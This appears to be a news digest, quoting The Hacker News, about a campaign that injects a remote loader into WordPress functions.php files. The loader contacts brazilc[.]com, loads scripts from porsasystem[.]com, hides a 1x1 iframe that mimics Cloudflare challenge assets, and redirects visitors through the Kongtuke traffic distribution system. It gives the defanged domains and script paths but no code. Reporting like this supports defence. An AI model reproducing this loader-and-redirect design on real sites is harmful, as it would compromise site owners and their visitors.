"The code inserted into "functions.php" incorporates references to Google Ads, likely in an attempt to evade detection. But, in reality, it functions as a remote loader by sending an HTTP POST request to the domain "brazilc[.]com," which, in turn, responds with a dynamic payload that includes two components - A JavaScript file hosted on a remote server ("porsasystem[.]com"), which, as of writing, has been referenced on 17 websites and contains code to perform site redirects"
"A piece of JavaScript code that creates a hidden, 1x1 pixel iframe, within which it injects code that mimics legitimate Cloudflare assets like "cdn-cgi/challenge-platform/scripts/jsd/main.js" - an API that's a core part of its bot detection and challenge platform. It's worth noting that the domain " porsasystem[.]com" has been flagged as part of a traffic distribution system (TDS) called Kongtuke (aka 404 TDS, Chaya_002, LandUpdate808, and TAG-124)."
A campaign targets WordPress sites by injecting malicious JavaScript into theme files (functions.php). The injected code references Google Ads but operates as a remote loader that issues an HTTP POST to brazilc[.]com. The response returns a dynamic payload that loads a remote script from porsasystem[.]com which performs site redirects and injects a hidden 1x1 iframe. The iframe content mimics Cloudflare challenge assets (cdn-cgi/challenge-platform/scripts/jsd/main.js) to evade detection. The porsasystem[.]com domain is associated with a traffic distribution system (Kongtuke/404 TDS/Chaya_002/LandUpdate808/TAG-124). The infection chain runs porsasystem[.]com/6m9x.js then porsasystem[.]com/js.php to redirect victims to ClickFix-s.
Read at The Hacker News
Unable to calculate read time
Collection
[
|
...
]